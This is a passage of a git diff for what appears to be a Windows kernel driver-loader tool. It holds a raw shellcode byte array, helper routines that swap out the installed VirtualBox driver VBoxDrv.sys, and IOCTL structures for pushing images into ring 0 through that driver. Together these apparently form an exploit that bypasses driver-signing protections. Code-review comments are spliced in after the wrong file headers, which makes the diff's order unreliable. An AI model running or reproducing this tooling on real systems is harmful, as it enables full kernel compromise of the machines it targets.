0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, + 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, + 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, + 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, + 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, + 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, + 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, + 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, + 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, + 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, + 0x0A, 0x75, 0x22, 0x41, 0x8B, 
0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, + 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, + 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, + 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, + 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, + 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, + 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, + 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, + 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, + 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, + 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, + 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, + 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, + 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 +}; diff --git a/Source/Furutaka/sup.c b/Source/Furutaka/sup.c new file mode 100644 index 0000000..b1d4b91 --- /dev/null +++ b/Source/Furutaka/sup.c 
@@ -0,0 +1,422 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2016
+*
+* TITLE: SUP.C
+*
+* VERSION: 1.00
+*
+* DATE: 01 Feb 2016
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+
+/*
+* supGetSystemInfo
+*
+* Purpose:
+*
+* Wrapper for NtQuerySystemInformation.
+*
+*/
+PVOID supGetSystemInfo(
+ _In_ SYSTEM_INFORMATION_CLASS InfoClass
+ )
+{
+ INT c = 0;
+ PVOID Buffer = NULL;
+ ULONG Size = 0x1000;
+ NTSTATUS status;
+ ULONG memIO;
+ PVOID hHeap = NtCurrentPeb()->ProcessHeap;
+
+ do {
+ Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size);
+ if (Buffer != NULL) {
+ status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);
+ }
+ else {
+ return NULL;
+ }
+ if (status == STATUS_INFO_LENGTH_MISMATCH) {
+ RtlFreeHeap(hHeap, 0, Buffer);
+ Size *= 2;
+ c++;
+ if (c > 100) {
+ status = STATUS_SECRET_TOO_LONG;
+ break;
+ }
+ }
+ } while (status == STATUS_INFO_LENGTH_MISMATCH);
+
+ if (NT_SUCCESS(status)) {
+ return Buffer;
+ }
+
+ if (Buffer) {
+ RtlFreeHeap(hHeap, 0, Buffer);
+ }
+ return NULL;
+}
+
+/*
+* supGetNtOsBase
+*
+* Purpose:
+*
+* Return ntoskrnl base address.
+*
+*/
+ULONG_PTR supGetNtOsBase(
+ VOID
+ )
+{
+ PRTL_PROCESS_MODULES miSpace;
+ ULONG_PTR NtOsBase = 0;
+
+ miSpace = supGetSystemInfo(SystemModuleInformation);
+ while (miSpace != NULL) {
+ NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
+ RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace);
+ break;
+ }
+ return NtOsBase;
+}
+
+/*
+* supQueryResourceData
+*
+* Purpose:
+*
+* Load resource by given id (win32 FindResource, SizeofResource, LockResource).
+*
+*/
+PBYTE supQueryResourceData(
+ _In_ ULONG_PTR ResourceId,
+ _In_ PVOID DllHandle,
+ _In_ PULONG DataSize
+ )
+{
+ NTSTATUS status;
+ ULONG_PTR IdPath[3];
+ IMAGE_RESOURCE_DATA_ENTRY *DataEntry;
+ PBYTE Data = NULL;
+ ULONG SizeOfData = 0;
+
+ if (DllHandle != NULL) {
+
+ IdPath[0] = (ULONG_PTR)RT_RCDATA; //type
+ IdPath[1] = ResourceId; //id
+ IdPath[2] = 0; //lang
+
+ status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);
+ if (NT_SUCCESS(status)) {
+ status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData);
+ if (NT_SUCCESS(status)) {
+ if (DataSize) {
+ *DataSize = SizeOfData;
+ }
+ }
+ }
+ }
+ return Data;
+}
+
+/*
+* supBackupVBoxDrv
+*
+* Purpose:
+*
+* Backup virtualbox driver file if it already installed.
+*
+*/
+BOOL supBackupVBoxDrv(
+ _In_ BOOL bRestore
+ )
+{
+ BOOL bResult = FALSE;
+ WCHAR szOldDriverName[MAX_PATH * 2];
+ WCHAR szNewDriverName[MAX_PATH * 2];
+ WCHAR szDriverDirName[MAX_PATH * 2];
+
+ if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) {
+ return FALSE;
+ }
+
+ _strcat(szDriverDirName, TEXT("\\drivers\\"));
+
+ if (bRestore) {
+ _strcpy(szOldDriverName, szDriverDirName);
+ _strcat(szOldDriverName, TEXT("VBoxDrv.backup"));
+ if (PathFileExists(szOldDriverName)) {
+ _strcpy(szNewDriverName, szDriverDirName);
+ _strcat(szNewDriverName, TEXT("VBoxDrv.sys"));
+ bResult = MoveFileEx(szOldDriverName, szNewDriverName,
+ MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
+ }
+ }
+ else {
+ _strcpy(szOldDriverName, szDriverDirName);
+ _strcat(szOldDriverName, TEXT("VBoxDrv.sys"));
+ _strcpy(szNewDriverName, szDriverDirName);
+ _strcat(szNewDriverName, TEXT("VBoxDrv.backup"));
+ bResult = MoveFileEx(szOldDriverName, szNewDriverName,
+ MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
+ }
+ return bResult;
+}
+
+/*
+* supWriteBufferToFile
+*
+* Purpose:
+*
+* Create new file (or open existing) and write (append) buffer to it.
+*
+*/
+SIZE_T supWriteBufferToFile(
+ _In_ PWSTR lpFileName,
+ _In_ PVOID Buffer,
+ _In_ SIZE_T Size,
+ _In_ BOOL Flush,
+ _In_ BOOL Append
+ )
+{
+ NTSTATUS Status;
+ DWORD dwFlag;
+ HANDLE hFile = NULL;
+ OBJECT_ATTRIBUTES attr;
+ UNICODE_STRING NtFileName;
+ IO_STATUS_BLOCK IoStatus;
+ LARGE_INTEGER Position;
+ ACCESS_MASK DesiredAccess;
+ PLARGE_INTEGER pPosition = NULL;
+ ULONG_PTR nBlocks, BlockIndex;
+ ULONG BlockSize, RemainingSize;
+ PBYTE ptr = (PBYTE)Buffer;
+ SIZE_T BytesWritten = 0;
+
+ if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE)
+ return 0;
+
+ DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE;
+ dwFlag = FILE_OVERWRITE_IF;
+
+ if (Append == TRUE) {
+ DesiredAccess |= FILE_READ_ACCESS;
+ dwFlag = FILE_OPEN_IF;
+ }
+
+ InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);
+
+ __try {
+ Status = NtCreateFile(&hFile, DesiredAccess, &attr,
+ &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag,
+ FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);
+
+ if (!NT_SUCCESS(Status))
+ __leave;
+
+ pPosition = NULL;
+
+ if (Append == TRUE) {
+ Position.LowPart = FILE_WRITE_TO_END_OF_FILE;
+ Position.HighPart = -1;
+ pPosition = &Position;
+ }
+
+ if (Size < 0x80000000) {
+ BlockSize = (ULONG)Size;
+ Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
+ if (!NT_SUCCESS(Status))
+ __leave;
+
+ BytesWritten += IoStatus.Information;
+ }
+ else {
+ BlockSize = 0x7FFFFFFF;
+ nBlocks = (Size / BlockSize);
+ for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) {
+
+ Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
+ if (!NT_SUCCESS(Status))
+ __leave;
+
+ ptr += BlockSize;
+ BytesWritten += IoStatus.Information;
+ }
+ RemainingSize = Size % BlockSize;
+ if (RemainingSize != 0) {
+ Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL);
+ if (!NT_SUCCESS(Status))
+ __leave;
+ BytesWritten += IoStatus.Information;
+ }
+ }
+ }
+ __finally {
+ if (hFile != NULL) {
+ if (Flush == TRUE) NtFlushBuffersFile(hFile, &IoStatus);
+ NtClose(hFile);
+ }
+ RtlFreeUnicodeString(&NtFileName);
+ }
+ return BytesWritten;
+}
+
+/*
+* supDetectObjectCallback
+*
+* Purpose:
+*
+* Comparer callback routine used in objects enumeration.
+*
+*/
+NTSTATUS NTAPI supDetectObjectCallback(
+ _In_ POBJECT_DIRECTORY_INFORMATION Entry,
+ _In_ PVOID CallbackParam
+ )
+{
+ POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
+
+ if (Entry == NULL) {
+ return STATUS_INVALID_PARAMETER_1;
+ }
+
+ if (CallbackParam == NULL) {
+ return STATUS_INVALID_PARAMETER_2;
+ }
+
+ if (Param->Buffer == NULL || Param->BufferSize == 0) {
+ return STATUS_MEMORY_NOT_ALLOCATED;
+ }
+
+ if (Entry->Name.Buffer) {
+ if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) {
+ return STATUS_SUCCESS;
+ }
+ }
+ return STATUS_UNSUCCESSFUL;
+}
+
+/*
+* supEnumSystemObjects
+*
+* Purpose:
+*
+* Lookup object by name in given directory.
+*
+*/
+NTSTATUS NTAPI supEnumSystemObjects(
+ _In_opt_ LPWSTR pwszRootDirectory,
+ _In_opt_ HANDLE hRootDirectory,
+ _In_ PENUMOBJECTSCALLBACK CallbackProc,
+ _In_opt_ PVOID CallbackParam
+ )
+{
+ BOOL cond = TRUE;
+ ULONG ctx, rlen;
+ HANDLE hDirectory = NULL;
+ NTSTATUS status;
+ NTSTATUS CallbackStatus;
+ OBJECT_ATTRIBUTES attr;
+ UNICODE_STRING sname;
+
+ POBJECT_DIRECTORY_INFORMATION objinf;
+
+ if (CallbackProc == NULL) {
+ return STATUS_INVALID_PARAMETER_4;
+ }
+
+ status = STATUS_UNSUCCESSFUL;
+
+ __try {
+
+ // We can use root directory.
+ if (pwszRootDirectory != NULL) {
+ RtlSecureZeroMemory(&sname, sizeof(sname));
+ RtlInitUnicodeString(&sname, pwszRootDirectory);
+ InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL);
+ status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr);
+ if (!NT_SUCCESS(status)) {
+ return status;
+ }
+ }
+ else {
+ if (hRootDirectory == NULL) {
+ return STATUS_INVALID_PARAMETER_2;
+ }
+ hDirectory = hRootDirectory;
+ }
+
+ // Enumerate objects in directory.
+ ctx = 0;
+ do {
+
+ rlen = 0;
+ status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen);
+ if (status != STATUS_BUFFER_TOO_SMALL)
+ break;
+
+ objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
+ if (objinf == NULL)
+ break;
+
+ status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen);
+ if (!NT_SUCCESS(status)) {
+ RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
+ break;
+ }
+
+ CallbackStatus = CallbackProc(objinf, CallbackParam);
+
+ RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
+
+ if (NT_SUCCESS(CallbackStatus)) {
+ status = STATUS_SUCCESS;
+ break;
+ }
+
+ } while (cond);
+
+ if (hDirectory != NULL) {
+ NtClose(hDirectory);
+ }
+
+ }
+ __except (EXCEPTION_EXECUTE_HANDLER) {
+ status = STATUS_ACCESS_VIOLATION;
+ }
+
+ return status;
+}
+
+/*
+* supIsObjectExists
+*
+* Purpose:
+*
+* Return TRUE if the given object exists, FALSE otherwise.
+*
+*/
+BOOL supIsObjectExists(
+ _In_ LPWSTR RootDirectory,
+ _In_ LPWSTR ObjectName
+ )
+{
+ OBJSCANPARAM Param;
+
+ if (ObjectName == NULL) {
+ return FALSE;
+ }
+
+ Param.Buffer = ObjectName;
+ Param.BufferSize = (ULONG)_strlen(ObjectName);
+
+ return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param));
+}
diff --git a/Source/Furutaka/sup.h b/Source/Furutaka/sup.h
new file mode 100644
index 0000000..e1cd4fa
--- /dev/null
+++ b/Source/Furutaka/sup.h
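Review bot: supGetSystemInfo can free the same block twice: the STATUS_INFO_LENGTH_MISMATCH branch releases Buffer with RtlFreeHeap but leaves the pointer dangling, so when the retry limit trips (`c > 100`) and the loop breaks, the trailing `if (Buffer) RtlFreeHeap(hHeap, 0, Buffer);` frees it again; add `Buffer = NULL;` immediately after that RtlFreeHeap in the mismatch branch. supEnumSystemObjects has a related ownership slip: when the caller passes hRootDirectory instead of a name, hDirectory aliases the caller's handle and the cleanup `if (hDirectory != NULL) NtClose(hDirectory);` closes a handle this function does not own, so it should be `if (pwszRootDirectory != NULL && hDirectory != NULL) NtClose(hDirectory);` (the early `return status` after a failed NtOpenDirectoryObject is fine, nothing was opened). In supDetectObjectCallback, Entry->Name is a UNICODE_STRING whose Buffer is not guaranteed to be NUL-terminated, so `_strcmpi_w(Entry->Name.Buffer, Param->Buffer)` presumably relies on NtQueryDirectoryObject terminating the name; a compare bounded by Name.Length would remove that assumption.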
@@ -0,0 +1,59 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2016
+*
+* TITLE: SUP.H
+*
+* VERSION: 1.00
+*
+* DATE: 01 Feb 2016
+*
+* Common header file for the program support routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
+
+typedef struct _OBJSCANPARAM {
+ PWSTR Buffer;
+ ULONG BufferSize;
+} OBJSCANPARAM, *POBJSCANPARAM;
+
+ULONG_PTR supGetNtOsBase(
+ VOID
+ );
+
+PVOID supGetSystemInfo(
+ _In_ SYSTEM_INFORMATION_CLASS InfoClass
+ );
+
+PBYTE supQueryResourceData(
+ _In_ ULONG_PTR ResourceId,
+ _In_ PVOID DllHandle,
+ _In_ PULONG DataSize
+ );
+
+BOOL supBackupVBoxDrv(
+ _In_ BOOL bRestore
+ );
+
+SIZE_T supWriteBufferToFile(
+ _In_ PWSTR lpFileName,
+ _In_ PVOID Buffer,
+ _In_ SIZE_T Size,
+ _In_ BOOL Flush,
+ _In_ BOOL Append
+ );
+
+BOOL supIsObjectExists(
+ _In_ LPWSTR RootDirectory,
+ _In_ LPWSTR ObjectName
+ );
+
+#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)
diff --git a/Source/Furutaka/vbox.h b/Source/Furutaka/vbox.h
new file mode 100644
index 0000000..8282178
--- /dev/null
+++ b/Source/Furutaka/vbox.h
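Review bot: The PENUMOBJECTSCALLBACK contract is undocumented, yet supEnumSystemObjects stops at the first entry for which the callback returns a success status and then reports STATUS_SUCCESS, so the typedef deserves a comment such as `// Invoked once per directory entry; return an NT success status to stop the enumeration (object found), a failure status to continue.`. OBJSCANPARAM.BufferSize is equally ambiguous: supIsObjectExists fills it from `_strlen(ObjectName)`, which appears to be a character count rather than the byte count its name suggests, and supDetectObjectCallback only tests it for zero, so `ULONG BufferSize; // length of Buffer in WCHARs, excluding the terminator` would settle the unit. The `PathFileExists` macro compares against `(DWORD)-1`; the named constant `INVALID_FILE_ATTRIBUTES` from the Windows headers carries the same value and reads as intent rather than magic.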
@@ -0,0 +1,226 @@
+#include
+
+typedef void* RTR0PTR;
+
+typedef struct _SUPREQHDR {
+ /** Cookie. */
+ uint32_t u32Cookie;
+ /** Session cookie. */
+ uint32_t u32SessionCookie;
+ /** The size of the input. */
+ uint32_t cbIn;
+ /** The size of the output. */
+ uint32_t cbOut;
+ /** Flags. See SUPREQHDR_FLAGS_* for details and values. */
+ uint32_t fFlags;
+ /** The VBox status code of the operation, out direction only. */
+ int32_t rc;
+} SUPREQHDR;
+
+/** SUP_IOCTL_COOKIE. */
+typedef struct _SUPCOOKIE {
+ /** The header.
+ * u32Cookie must be set to SUPCOOKIE_INITIAL_COOKIE.
+ * u32SessionCookie should be set to some random value. */
+ SUPREQHDR Hdr;
+ union
+ {
+ struct
+ {
+ /** Magic word. */
+ char szMagic[16];
+ /** The requested interface version number. */
+ uint32_t u32ReqVersion;
+ /** The minimum interface version number. */
+ uint32_t u32MinVersion;
+ } In;
+ struct
+ {
+ /** Cookie. */
+ uint32_t u32Cookie;
+ /** Session cookie. */
+ uint32_t u32SessionCookie;
+ /** Interface version for this session. */
+ uint32_t u32SessionVersion;
+ /** The actual interface version in the driver. */
+ uint32_t u32DriverVersion;
+ /** Number of functions available for the SUP_IOCTL_QUERY_FUNCS request. */
+ uint32_t cFunctions;
+ /** Session handle. */
+ /*R0PTRTYPE(PSUPDRVSESSION)*/ PVOID pSession;
+ } Out;
+ } u;
+} SUPCOOKIE, *PSUPCOOKIE;
+
+typedef struct _SUPLDROPEN {
+ /** The header. */
+ SUPREQHDR Hdr;
+ union
+ {
+ struct
+ {
+ /** Size of the image we'll be loading. */
+ uint32_t cbImage;
+ /** Image name.
+ * This is the NAME of the image, not the file name. It is used
+ * to share code with other processes. (Max len is 32 chars!) */
+ char szName[32];
+ } In;
+ struct
+ {
+ /** The base address of the image. */
+ RTR0PTR pvImageBase;
+ /** Indicate whether or not the image requires loading. */
+ BOOLEAN fNeedsLoading;
+ } Out;
+ } u;
+} SUPLDROPEN, *PSUPLDROPEN;
+
+typedef enum _SUPLDRLOADEP {
+ SUPLDRLOADEP_NOTHING = 0,
+ SUPLDRLOADEP_VMMR0,
+ SUPLDRLOADEP_SERVICE,
+ SUPLDRLOADEP_32BIT_HACK = 0x7fffffff
+} SUPLDRLOADEP;
+
+typedef struct _SUPSETVMFORFAST {
+ /** The header. */
+ SUPREQHDR Hdr;
+ union
+ {
+ struct
+ {
+ /** The ring-0 VM handle (pointer). */
+ PVOID pVMR0;
+ } In;
+ } u;
+} SUPSETVMFORFAST, *PSUPSETVMFORFAST;
+
+typedef struct _SUPLDRLOAD
+{
+ /** The header. */
+ SUPREQHDR Hdr;
+ union
+ {
+ struct
+ {
+ /** The address of module initialization function. Similar to _DLL_InitTerm(hmod, 0). */
+ PVOID pfnModuleInit;
+ /** The address of module termination function. Similar to _DLL_InitTerm(hmod, 1). */
+ PVOID pfnModuleTerm;
+ /** Special entry points. */
+ union
+ {
+ /** SUPLDRLOADEP_VMMR0. */
+ struct
+ {
+ /** The module handle (i.e. address). */
+ RTR0PTR pvVMMR0;
+ /** Address of VMMR0EntryInt function. */
+ RTR0PTR pvVMMR0EntryInt;
+ /** Address of VMMR0EntryFast function. */
+ RTR0PTR pvVMMR0EntryFast;
+ /** Address of VMMR0EntryEx function. */
+ RTR0PTR pvVMMR0EntryEx;
+ } VMMR0;
+ /** SUPLDRLOADEP_SERVICE. */
+ struct
+ {
+ /** The service request handler.
+ * (PFNR0SERVICEREQHANDLER isn't defined yet.) */
+ RTR0PTR pfnServiceReq;
+ /** Reserved, must be NIL. */
+ RTR0PTR apvReserved[3];
+ } Service;
+ } EP;
+ /** Address. */
+ RTR0PTR pvImageBase;
+ /** Entry point type. */
+ SUPLDRLOADEP eEPType;
+ /** The offset of the symbol table. */
+ uint32_t offSymbols;
+ /** The number of entries in the symbol table. */
+ uint32_t cSymbols;
+ /** The offset of the string table. */
+ uint32_t offStrTab;
+ /** Size of the string table. */
+ uint32_t cbStrTab;
+ /** Size of image (including string and symbol tables). */
+ uint32_t cbImage;
+ /** The image data. */
+ char achImage[1];
+ } In;
+ } u;
+} SUPLDRLOAD, *PSUPLDRLOAD;
+
+
+#define RT_SIZEOFMEMB(type, member) ( sizeof(((type *)(void *)0)->member) )
+#define SUPCOOKIE_INITIAL_COOKIE 0x69726f74 /* 'tori' */
+#define SUP_IOCTL_COOKIE_SIZE_IN sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPCOOKIE, u.In)
+#define SUP_IOCTL_COOKIE_SIZE_OUT sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPCOOKIE, u.Out)
+
+#define SUP_IOCTL_FLAG 128
+
+#define SUP_CTL_CODE_SIZE(Function, Size) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_BUFFERED, FILE_WRITE_ACCESS)
+#define SUP_CTL_CODE_BIG(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_BUFFERED, FILE_WRITE_ACCESS)
+#define SUP_CTL_CODE_FAST(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_NEITHER, FILE_WRITE_ACCESS)
+#define SUP_CTL_CODE_NO_SIZE(uIOCtl) (uIOCtl)
+
+/** The magic value. */
+#define SUPREQHDR_FLAGS_MAGIC UINT32_C(0x42000042)
+/** The default value. Use this when no special stuff is requested. */
+#define SUPREQHDR_FLAGS_DEFAULT SUPREQHDR_FLAGS_MAGIC
+#define VERR_INTERNAL_ERROR (-225)
+#define SUPCOOKIE_MAGIC "The Magic Word!"
+#define SUPDRV_IOC_VERSION 0x001a0007
+/** The request size. */
+#define SUP_IOCTL_COOKIE_SIZE sizeof(SUPCOOKIE)
+/** Negotiate cookie. */
+#define SUP_IOCTL_COOKIE SUP_CTL_CODE_SIZE(1, SUP_IOCTL_COOKIE_SIZE)
+
+/** There is extra input that needs copying on some platforms. */
+#define SUPREQHDR_FLAGS_EXTRA_IN UINT32_C(0x00000100)
+/** There is extra output that needs copying on some platforms. */
+#define SUPREQHDR_FLAGS_EXTRA_OUT UINT32_C(0x00000200)
+
+/** @name SUP_IOCTL_SET_VM_FOR_FAST
+ * Set the VM handle for doing fast call ioctl calls.
+ * @{
+ */
+#define SUP_IOCTL_SET_VM_FOR_FAST SUP_CTL_CODE_SIZE(19, SUP_IOCTL_SET_VM_FOR_FAST_SIZE)
+#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE sizeof(SUPSETVMFORFAST)
+#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN sizeof(SUPSETVMFORFAST)
+#define SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT sizeof(SUPREQHDR)
+#define SUP_IOCTL_FAST_DO_NOP SUP_CTL_CODE_FAST(66)
+
+#define SUP_IOCTL_LDR_OPEN SUP_CTL_CODE_SIZE(5, SUP_IOCTL_LDR_OPEN_SIZE)
+#define SUP_IOCTL_LDR_OPEN_SIZE sizeof(SUPLDROPEN)
+#define SUP_IOCTL_LDR_OPEN_SIZE_IN sizeof(SUPLDROPEN)
+#define SUP_IOCTL_LDR_OPEN_SIZE_OUT (sizeof(SUPREQHDR) + RT_SIZEOFMEMB(SUPLDROPEN, u.Out))
+
+#define SUP_IOCTL_LDR_LOAD SUP_CTL_CODE_BIG(6)
+#define SUP_IOCTL_LDR_LOAD_SIZE(cbImage) RT_UOFFSETOF(SUPLDRLOAD, u.In.achImage[cbImage])
+#define SUP_IOCTL_LDR_LOAD_SIZE_IN(cbImage) RT_UOFFSETOF(SUPLDRLOAD, u.In.achImage[cbImage])
+#define SUP_IOCTL_LDR_LOAD_SIZE_OUT sizeof(SUPREQHDR)
+
+ /** @name SUP_IOCTL_LDR_FREE
+ * Free an image.
+ * @{
+ */
+#define SUP_IOCTL_LDR_FREE SUP_CTL_CODE_SIZE(7, SUP_IOCTL_LDR_FREE_SIZE)
+#define SUP_IOCTL_LDR_FREE_SIZE sizeof(SUPLDRFREE)
+#define SUP_IOCTL_LDR_FREE_SIZE_IN sizeof(SUPLDRFREE)
+#define SUP_IOCTL_LDR_FREE_SIZE_OUT sizeof(SUPREQHDR)
+
+typedef struct _SUPLDRFREE {
+ /** The header. */
+ SUPREQHDR Hdr;
+ union
+ {
+ struct
+ {
+ /** Address. */
+ RTR0PTR pvImageBase;
+ } In;
+ } u;
+} SUPLDRFREE, *PSUPLDRFREE;
diff --git a/TDL.sha256 b/TDL.sha256
new file mode 100644
index 0000000..2d5ae90
--- /dev/null
+++ b/TDL.sha256
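Review bot: `SUP_IOCTL_LDR_LOAD_SIZE` and `SUP_IOCTL_LDR_LOAD_SIZE_IN` expand to `RT_UOFFSETOF(...)`, which this header never defines even though it defines the companion `RT_SIZEOFMEMB` a few lines earlier; either define it here (e.g. `#define RT_UOFFSETOF(type, member) ((size_t)&((type *)0)->member)`, constructed) or add a comment stating that global.h is expected to provide it. The header also lacks the `#pragma once` that sup.h carries, and its first line is a bare `#include` with no target as rendered here — presumably `<stdint.h>` for the uint32_t/int32_t fields, which should be confirmed against the committed file. `SUP_CTL_CODE_SIZE(Function, Size)` ignores its Size argument; if that intentionally mirrors the Windows branch of VirtualBox's SUPDrvIOC.h, a one-line comment saying so (`/* Size is unused on Windows; kept for source compatibility with SUPDrvIOC.h */`) would stop readers from treating it as a bug.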
@@ -0,0 +1,47 @@
+c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys
+4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys
+48820631b430a40f296b17280bc18736f8ac428514ffd931b4b529dc5cc04136 *Compiled\Furutaka.exe
+01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj
+2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters
+d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user
